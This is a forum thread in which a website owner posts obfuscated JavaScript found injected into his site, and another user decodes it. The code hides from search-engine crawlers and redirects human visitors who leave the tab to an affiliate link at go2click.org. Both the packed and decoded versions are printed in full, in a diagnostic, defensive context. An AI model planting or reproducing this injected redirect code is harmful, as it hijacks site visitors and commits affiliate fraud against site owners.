GoFuckYourself.com - Adult Webmaster Forum - Tech Found a script in my site

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - Tech Found a script in my site (https://gfy.com/showthread.php?t=1223707)

Found a script in my site

This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

Gonna update my wordpress sites. Change my password. Any other ideas?
Here is the code I found. Thanks.

Code:

<br></br><br></br>

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDuckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>

Quote:

Originally Posted by lezinterracial (Post 21242332)

Code:

<br></br><br></br>

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDuckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>

Here is the original code:

Code:

blur_started1 = null;

switch_flag1 = false;

window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();

now.setTime(now.getTime()+60*60*24*7*1000);

var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');

if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";

if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};

window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)};

It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.

Quote:

Originally Posted by CyberSEO (Post 21242362)

Here is the original code:

Code:

blur_started1 = null;

switch_flag1 = false;

window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();

now.setTime(now.getTime()+60*60*24*7*1000);

var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');

if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";

if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};

window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)};

It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.

Yep. the go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3 f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&ut m_campaign=476cb13b&utm_content=2617&data2=06pvh21 bg0082

Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know

Quote:

Originally Posted by lezinterracial (Post 21242389)

Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know

If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid :2 cents:

Quote:

Originally Posted by CyberSEO (Post 21242398)

If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid :2 cents:

https://help.dreamhost.com/hc/en-us/...ite-was-hacked

Noticed no world writable directories.
find . -type d -perm -o=w

And no logins from any other ips over the past month. I used the command

last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c

Just gotta keep looking through the logs.

oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.

I scanned my computer for malware, None found. I went ahead and updated php 5.5 to 5.6. Weird timing causing dreamhost just moved me to a new server this evening.

Just gonna keep an eye on the files and see if they get modified again. Then I will no where to look in the logs.

On a positive note. I have learned much today. First time I have used putty to connect to my web server to get a shell. Learned some about PHP hacking.